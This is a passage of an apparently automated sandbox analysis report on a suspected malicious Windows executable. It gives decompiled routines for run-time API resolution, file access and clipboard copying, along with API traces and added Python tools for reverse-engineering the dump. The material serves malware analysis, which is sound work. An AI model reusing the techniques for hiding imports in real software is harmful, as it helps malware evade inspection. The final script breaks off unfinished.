					return GetProcAddress(_t5,  *(_t10 + 0x40920c));   // entry.proc_name
				}
				_t5 = E00405EE9(_t8); // executed            // load <SystemDirectory>\<dll_name>
				if(_t5 == 0) {
					return 0;                                // unresolved; callers must check for NULL
				}
				goto L2;
			}

Instruction addresses for the listing above (one per decompiled line; 0x00000000 marks a line with no instruction): 0x00405f5f, 0x00405f62, 0x00405f69, 0x00405f71, 0x00405f7d, 0x00000000, 0x00405f84, 0x00405f74, 0x00405f7b, 0x00000000, 0x00405f8c, 0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                      • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                                                      • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                                                      • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                    • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                                                                    • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                    • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
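E00405F57 above resolves its Windows APIs at run time from a table of pointer pairs, so those APIs never show up in the PE import directory; recovering the table from the memory dump (the 0x409000 region listed under Memory Dump Source contains the 0x409208 table) is how an analyst gets the real API set. The following Python is an added example, not code from the report or from the sample. The table layout (8-byte {dll_name, proc_name} pointer pairs at 0x409208, `index << 3` addressing) is taken from the decompiled function; the zero-entry terminator and the image contents below are my assumptions and constructed test data, since the decompiled code does not show how many entries exist.

```python
"""Recover the run-time-resolved imports behind E00405F57 from a dumped memory region."""
import struct

TABLE_VA = 0x409208        # table address from the decompiled code (*(_t10 + 0x409208))
ENTRY_SIZE = 8             # _a4 << 3: {DWORD dll_name_va, DWORD proc_name_va}


def read_cstr(image: bytes, base: int, va: int, max_len: int = 256) -> str:
    """Read a NUL-terminated ASCII string at virtual address `va` inside the dumped region."""
    off = va - base
    if off < 0 or off >= len(image):
        raise ValueError(f"pointer 0x{va:08x} lies outside the dumped region")
    end = image.find(b"\x00", off, off + max_len)
    if end == -1:
        raise ValueError(f"unterminated string at 0x{va:08x}")
    return image[off:end].decode("ascii")


def lookup(image: bytes, base: int, index: int):
    """Mirror E00405F57's addressing for one index: entry = TABLE_VA + (index << 3)."""
    off = TABLE_VA + (index << 3) - base
    dll_va, proc_va = struct.unpack_from("<II", image, off)
    return read_cstr(image, base, dll_va), read_cstr(image, base, proc_va)


def parse_lazy_import_table(image: bytes, base: int, table_va: int = TABLE_VA):
    """Walk the pointer pairs and return [(dll, proc), ...].

    Termination is an ASSUMPTION: stop at a NULL dll pointer, or at the first pointer
    that does not land inside the dumped region (the code itself carries no count).
    """
    entries = []
    off = table_va - base
    while off + ENTRY_SIZE <= len(image):
        dll_va, proc_va = struct.unpack_from("<II", image, off)
        if dll_va == 0:
            break
        try:
            entries.append((read_cstr(image, base, dll_va), read_cstr(image, base, proc_va)))
        except ValueError:
            break
        off += ENTRY_SIZE
    return entries


def build_constructed_image(base: int = 0x409000, size: int = 0x1000) -> bytes:
    """CONSTRUCTED sample region standing in for the 0x409000 dump: three entries at TABLE_VA,
    their strings placed at base + 0x300. Names are sample data, not taken from the dump."""
    img = bytearray(size)
    names = [("KERNEL32", "GetDiskFreeSpaceExA"),
             ("ADVAPI32", "RegDeleteKeyExA"),
             ("SHELL32", "SHAutoComplete")]
    str_off = 0x300
    tbl_off = TABLE_VA - base
    for dll, proc in names:
        ptrs = []
        for s in (dll, proc):
            data = s.encode("ascii") + b"\x00"
            img[str_off:str_off + len(data)] = data
            ptrs.append(base + str_off)
            str_off += len(data)
        struct.pack_into("<II", img, tbl_off, *ptrs)
        tbl_off += ENTRY_SIZE
    # the entry after the last one stays zero and acts as the assumed terminator
    return bytes(img)


if __name__ == "__main__":
    image = build_constructed_image()
    for i, (dll, proc) in enumerate(parse_lazy_import_table(image, 0x409000)):
        print(f"[{i}] {dll}!{proc}")
```

To apply this to the report's own dump, load the 0x409000 region (or the whole rebuilt image, since the name strings may live in another section) with its real base address and call `parse_lazy_import_table`; any pointer that falls outside the supplied bytes ends the walk, so supply the complete image when results look truncated.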

                                                                                    C-Code - Quality: 68%
			// File-open helper: reuses an existing file's attributes as CreateFileA's
			// dwFlagsAndAttributes, or passes 0 when GetFileAttributesA returned
			// INVALID_FILE_ATTRIBUTES (0xffffffff, i.e. the file does not exist).
			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");                         // neg/sbb/and select: ecx = (_t5 != 0xffffffff) ? _t5 : 0
				// The decompiler printed this select as ~(_t5 + 1) & _t5, which is not what the
				// instructions compute (it yields 0xffffffff for a missing file and 0 for attributes
				// such as 0x20); the expression below is the behaviour actually implemented.
				// _a8 = desired access, 1 = FILE_SHARE_READ, _a12 = creation disposition.
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12, (_t5 == 0xffffffff) ? 0 : _t5, 0); // executed
				return _t6;
			}

Instruction addresses for the listing above (one per decompiled line): 0x004058a2, 0x004058af, 0x004058c4, 0x004058ca

                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 004058A2
                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                    • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                    • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                    • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
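The attribute select in E0040589E is a good illustration of why decompiler output from a sandbox report should be checked against the flag semantics of the underlying instructions before being quoted in a write-up: the listing keeps `sbb ecx, ecx` as inline asm and renders the rest as `~(_t5 + 1) & _t5`. The Python below is an added example, not part of the report, that emulates the select on 32-bit registers and compares it with the decompiler's expression across a few attribute values. The full instruction sequence (`lea ecx,[eax+1]; neg ecx; sbb ecx,ecx; and ecx,eax`) is my assumption about what surrounds the surviving `sbb`; the attribute values are constructed test inputs.

```python
"""Emulate the neg/sbb/and select from E0040589E and compare it with the decompiler's rendering."""

MASK32 = 0xFFFFFFFF
INVALID_FILE_ATTRIBUTES = 0xFFFFFFFF


def emulate_select(attr: int) -> int:
    """ASSUMED sequence around the listed `sbb ecx, ecx`, run on 32-bit registers:
       lea ecx,[eax+1]; neg ecx; sbb ecx,ecx; and ecx,eax"""
    eax = attr & MASK32
    ecx = (eax + 1) & MASK32            # lea ecx, [eax+1]
    cf = 1 if ecx != 0 else 0           # neg sets CF for every non-zero operand
    ecx = (-ecx) & MASK32
    ecx = (ecx - ecx - cf) & MASK32     # sbb ecx, ecx -> 0x00000000 or 0xffffffff
    return ecx & eax                    # and ecx, eax -> attr, or 0 when attr was 0xffffffff


def decompiler_expr(attr: int) -> int:
    """The expression exactly as printed in the decompiled listing."""
    return (~(attr + 1) & MASK32) & attr


def intended(attr: int) -> int:
    """What the call site needs: 0 for a missing file, the attributes otherwise."""
    return 0 if attr == INVALID_FILE_ATTRIBUTES else attr


def compare(values):
    """Inputs on which the decompiler's rendering disagrees with the emulated instructions."""
    return [v for v in values if decompiler_expr(v) != emulate_select(v)]


# Constructed inputs: FILE_ATTRIBUTE_ARCHIVE, READONLY, DIRECTORY, ARCHIVE|READONLY, missing file
SAMPLE_ATTRS = [0x00000020, 0x00000001, 0x00000010, 0x00000021, INVALID_FILE_ATTRIBUTES]

if __name__ == "__main__":
    for v in SAMPLE_ATTRS:
        print(f"attr=0x{v:08x} emulated=0x{emulate_select(v):08x} "
              f"decompiler=0x{decompiler_expr(v):08x} intended=0x{intended(v):08x}")
    print("disagreements:", [hex(v) for v in compare(SAMPLE_ATTRS)])
```

The emulated select matches the intended behaviour for every input, while the printed expression agrees with it only by coincidence (for example on 0x00000001) and inverts the missing-file case, so the `CreateFileA` attribute argument in the listing should be read as `attr == INVALID_FILE_ATTRIBUTES ? 0 : attr`.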

                                                                                    C-Code - Quality: 100%
			// CreateDirectoryA wrapper: returns 0 on success, otherwise the Win32 error code
			// from GetLastError (so the caller can distinguish e.g. an already-existing
			// directory from a permission failure).
			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed   // default security descriptor
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

Instruction addresses for the listing above (one per decompiled line; 0x00000000 marks a line with no instruction): 0x004053f8, 0x00405400, 0x00000000, 0x00405406, 0x00000000

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                                                    • GetLastError.KERNEL32 ref: 00405406
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                    • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                                                                    • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                    • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
			// Exact-length read from the global file handle stored at 0x409014: returns 1 only if
			// ReadFile succeeded and delivered all _a8 bytes into _a4; a short read counts as failure.
			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;                                  // requested length; _a8 is then reused as lpNumberOfBytesRead
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {                // API failure or fewer bytes than requested
					return 0;
				} else {
					return 1;
				}
			}

Instruction addresses for the listing above (one per decompiled line; 0x00000000 marks a line with no instruction): 0x004030b4, 0x004030c7, 0x004030cf, 0x00000000, 0x004030d6, 0x00000000, 0x004030d8

APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
Memory Dump Source
• Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
• Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
• Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
• Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004030E2(long _a4) {
	long _t2;

	_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
	return _t2;
}

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,?), ref: 004030F0
Memory Dump Source
• Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
• Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
• Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
• Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 95%
E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
	struct HWND__* _v8;
	long _v12;
	struct tagRECT _v28;
	void* _v36;
	signed int _v40;
	int _v44;
	int _v48;
	signed int _v52;
	int _v56;
	void* _v60;
	void* _v68;
	void* __ebx;
	void* __edi;
	void* __esi;
	long _t87;
	unsigned int _t92;
	int _t94;
	int _t95;
	void* _t101;
	intOrPtr _t123;
	struct HWND__* _t127;
	int _t149;
	int _t150;
	struct HWND__* _t154;
	struct HWND__* _t158;
	struct HMENU__* _t160;
	long _t162;
	void* _t163;
	short* _t164;

	_t154 =  *0x42e404;
	_t149 = 0;
	_v8 = _t154;
	if(_a8 != 0x110) {
		if(_a8 == 0x405) {
			CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
		}
		if(_a8 != 0x111) {
			L17:
			if(_a8 != 0x404) {
				L25:
				if(_a8 != 0x7b || _a12 != _t154) {
					goto L20;
				} else {
					_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
					_a8 = _t87;
					if(_t87 <= _t149) {
						L37:
						return 0;
					}
					_t160 = CreatePopupMenu();
					AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
					_t92 = _a16;
					if(_t92 != 0xffffffff) {
						_t150 = _t92;
						_t94 = _t92 >> 0x10;
					} else {
						GetWindowRect(_t154,  &_v28);
						_t150 = _v28.left;
						_t94 = _v28.top;
					}
					_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
					_t162 = 1;
					if(_t95 == 1) {
						_v60 = _t149;
						_v48 = 0x42a0a0;
						_v44 = 0xfff;
						_a4 = _a8;
						do {
							_a4 = _a4 - 1;
							_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
						} while (_a4 != _t149);
						OpenClipboard(_t149);
						EmptyClipboard();
						_t101 = GlobalAlloc(0x42, _t162);
						_a4 = _t101;
						_t163 = GlobalLock(_t101);
						do {
							_v48 = _t163;
							_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
							 *_t164 = 0xa0d;
							_t163 = _t164 + 2;
							_t149 = _t149 + 1;
						} while (_t149 < _a8);
						GlobalUnlock(_a4);
						SetClipboardData(1, _a4);
						CloseClipboard();
					}
					goto L37;
				}
			}
			if( *0x42e3ec == _t149) {
				ShowWindow( *0x42ec28, 8);
				if( *0x42ecac == _t149) {
					E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
				}
				E00403E5C(1);
				goto L25;
			}
			 *0x429468 = 2;
			E00403E5C(0x78);
			goto L20;
		} else {
			if(_a12 != 0x403) {
				L20:
				return E00403EEA(_a8, _a12, _a16);
			}
			ShowWindow( *0x42e3f0, _t149);
			ShowWindow(_t154, 8);
			E00403EB8(_t154);
			goto L17;
		}
	}
	_v52 = _v52 | 0xffffffff;
	_v40 = _v40 | 0xffffffff;
	_v60 = 2;
	_v56 = 0;
	_v48 = 0;
	_v44 = 0;
	asm("stosd");
	asm("stosd");
	_t123 =  *0x42ec30;
	_a8 =  *((intOrPtr*)(_t123 + 0x5c));
	_a12 =  *((intOrPtr*)(_t123 + 0x60));
	 *0x42e3f0 = GetDlgItem(_a4, 0x403);
	 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
	_t127 = GetDlgItem(_a4, 0x3f8);
	 *0x42e404 = _t127;
	_v8 = _t127;
	E00403EB8( *0x42e3f0);
	 *0x42e3f4 = E00404755(4);
	 *0x42e40c = 0;
	GetClientRect(_v8,  &_v28);
	_v52 = _v28.right - GetSystemMetrics(0x15);
	SendMessageA(_v8, 0x101b, 0,  &_v60);
	SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
	if(_a8 >= 0) {
		SendMessageA(_v8, 0x1001, 0, _a8);
		SendMessageA(_v8, 0x1026, 0, _a8);
	}
	if(_a12 >= _t149) {
		SendMessageA(_v8, 0x1024, _t149, _a12);
	}
	_push( *((intOrPtr*)(_a16 + 0x30)));
	_push(0x1b);
	E00403E83(_a4);
	if(( *0x42ec38 & 0x00000003) != 0) {
		ShowWindow( *0x42e3f0, _t149);
		if(( *0x42ec38 & 0x00000002) != 0) {
			 *0x42e3f0 = _t149;
		} else {
			ShowWindow(_v8, 8);
		}
		E00403EB8( *0x42e3e8);
	}
	_t158 = GetDlgItem(_a4, 0x3ec);
	SendMessageA(_t158, 0x401, _t149, 0x75300000);
	if(( *0x42ec38 & 0x00000004) != 0) {
		SendMessageA(_t158, 0x409, _t149, _a12);
		SendMessageA(_t158, 0x2001, _t149, _a8);
	}
	goto L37;
}

                                                                                    0x0040502c
                                                                                    0x0040502f
                                                                                    0x00405030
                                                                                    0x00405031
                                                                                    0x0040504a
                                                                                    0x0040504d
                                                                                    0x00405057
                                                                                    0x00405066
                                                                                    0x0040506e
                                                                                    0x00405076
                                                                                    0x0040507b
                                                                                    0x0040507e
                                                                                    0x0040508a
                                                                                    0x00405093
                                                                                    0x0040509c
                                                                                    0x004050bf
                                                                                    0x004050c5
                                                                                    0x004050d6
                                                                                    0x004050db
                                                                                    0x004050e9
                                                                                    0x004050f7
                                                                                    0x004050f7
                                                                                    0x004050fc
                                                                                    0x0040510a
                                                                                    0x0040510a
                                                                                    0x0040510f
                                                                                    0x00405112
                                                                                    0x00405117
                                                                                    0x00405123
                                                                                    0x0040512c
                                                                                    0x00405139
                                                                                    0x00405148
                                                                                    0x0040513b
                                                                                    0x00405140
                                                                                    0x00405140
                                                                                    0x00405154
                                                                                    0x00405154
                                                                                    0x00405168
                                                                                    0x00405171
                                                                                    0x0040517a
                                                                                    0x0040518a
                                                                                    0x00405196
                                                                                    0x00405196
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00405050
                                                                                    • GetDlgItem.USER32 ref: 0040505F
                                                                                    • GetClientRect.USER32 ref: 0040509C
                                                                                    • GetSystemMetrics.USER32 ref: 004050A4
                                                                                    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                                                    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                                                    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405140
                                                                                    • GetDlgItem.USER32 ref: 00405161
                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                                                    • GetDlgItem.USER32 ref: 0040506E
                                                                                      • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                                                    • GetDlgItem.USER32 ref: 004051B3
                                                                                    • CreateThread.KERNEL32 ref: 004051C1
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                                                    • ShowWindow.USER32(00000000), ref: 004051EC
                                                                                    • ShowWindow.USER32(?,00000008), ref: 004051F1
                                                                                    • ShowWindow.USER32(00000008), ref: 00405238
                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040526A
                                                                                    • CreatePopupMenu.USER32 ref: 0040527B
                                                                                    • AppendMenuA.USER32 ref: 00405290
                                                                                    • GetWindowRect.USER32 ref: 004052A3
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405312
                                                                                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                                                                                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                                                    • GlobalLock.KERNEL32 ref: 0040532B
                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                                                    • SetClipboardData.USER32 ref: 00405362
                                                                                    • CloseClipboard.USER32 ref: 00405368
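                                                                                    The API list above records raw message numbers, which is what an analyst has to decode by hand to decide whether the "clipboard" and "keystroke" signatures come from the payload or from the host executable's own dialog code. The script below is an added example for this report; it is not sandbox output and not code from the analysed sample. It parses trace lines in the format shown above (TRACE is a hand-copied subset of that list; "?" is an argument the sandbox could not resolve), names the SendMessageA constants using the documented winuser.h/commctrl.h values (LVM_FIRST = 0x1000, WM_USER = 0x400, CCM_FIRST = 0x2000), decodes the WM_NOTIFY codes that appear as 0xfffffe6e, 0xfffffe6a and 0xfffffffe in the decompiled handler below (TVN_FIRST = -400), and reports whether the clipboard sequence is a read or a write. Function and variable names are the example's own.

```python
"""Annotate a Joe Sandbox-style Win32 API trace with symbolic names.

Added example for this report page; it is not sandbox output and not code
from the analysed sample.  Constants are the documented winuser.h /
commctrl.h values.  TRACE is a hand-copied subset of the APIs list in the
report; "?" marks an argument the sandbox left unresolved.
"""
import re

WM_USER, LVM_FIRST, CCM_FIRST = 0x0400, 0x1000, 0x2000
NM_FIRST, TVN_FIRST = 0, -400           # WM_NOTIFY codes are negative ints

MSG_NAMES = {
    0x004E: "WM_NOTIFY", 0x0110: "WM_INITDIALOG", 0x0111: "WM_COMMAND",
    0x0200: "WM_MOUSEMOVE",
    WM_USER + 1: "PBM_SETRANGE",        # WM_USER+1 means this only for a progress bar
    WM_USER + 9: "PBM_SETBARCOLOR",     # WM_USER+9, likewise
    LVM_FIRST + 1: "LVM_SETBKCOLOR", LVM_FIRST + 4: "LVM_GETITEMCOUNT",
    LVM_FIRST + 27: "LVM_INSERTCOLUMNA", LVM_FIRST + 36: "LVM_SETTEXTCOLOR",
    LVM_FIRST + 38: "LVM_SETTEXTBKCOLOR", LVM_FIRST + 45: "LVM_GETITEMTEXTA",
    LVM_FIRST + 54: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    CCM_FIRST + 1: "CCM_SETBKCOLOR",
}
NOTIFY_NAMES = {NM_FIRST - 2: "NM_CLICK", TVN_FIRST - 2: "TVN_SELCHANGEDA",
                TVN_FIRST - 6: "TVN_ITEMEXPANDEDA"}
GMEM_FLAGS = {0x0002: "GMEM_MOVEABLE", 0x0040: "GMEM_ZEROINIT"}

LINE_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<mod>\w+)"        # SendMessageA.USER32
    r"(?:\((?P<args>[^)]*)\))?,?\s*"         # optional (arg,arg,...)
    r"ref:\s*(?P<ref>[0-9A-Fa-f]{8})"        # call-site address
)

# Constructed input: a subset of the report's API list, copied verbatim.
TRACE = """\
• SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040526A
• CreatePopupMenu.USER32 ref: 0040527B
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
• OpenClipboard.USER32(00000000), ref: 00405312
• EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
• GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
• SetClipboardData.USER32 ref: 00405362
• CloseClipboard.USER32 ref: 00405368
"""


def parse_trace(text):
    """Return one dict per recognised trace line; unresolved args become None."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [
            int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None
            for a in raw.split(",")]
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def msg_name(msg):
    return MSG_NAMES.get(msg, f"0x{msg:04X}")


def notify_name(code32):
    """Map a 32-bit NMHDR.code as printed in the decompilation to its name."""
    code = code32 - (1 << 32) if code32 & 0x80000000 else code32
    return NOTIFY_NAMES.get(code, str(code))


def describe(call):
    """One annotated line per call: address, API, decoded message or flags."""
    api, args = call["api"], call["args"]
    note = ""
    if api == "SendMessageA" and len(args) > 1 and args[1] is not None:
        note = msg_name(args[1])
        if note == "PBM_SETRANGE" and len(args) > 3 and args[3] is not None:
            # lParam = MAKELPARAM(min, max): LOWORD is min, HIWORD is max
            note += f" (range {args[3] & 0xFFFF}..{args[3] >> 16})"
    elif api == "GlobalAlloc" and args and args[0] is not None:
        note = "|".join(n for bit, n in GMEM_FLAGS.items() if args[0] & bit)
    return f"{call['ref']:08X} {api:<18} {note}".rstrip()


def clipboard_direction(calls):
    """'write', 'read', 'both' or None, from which clipboard data APIs appear."""
    apis = {c["api"] for c in calls}
    w, r = "SetClipboardData" in apis, "GetClipboardData" in apis
    return "both" if w and r else "write" if w else "read" if r else None


if __name__ == "__main__":
    trace = parse_trace(TRACE)
    for c in trace:
        print(describe(c))
    print("clipboard:", clipboard_direction(trace))
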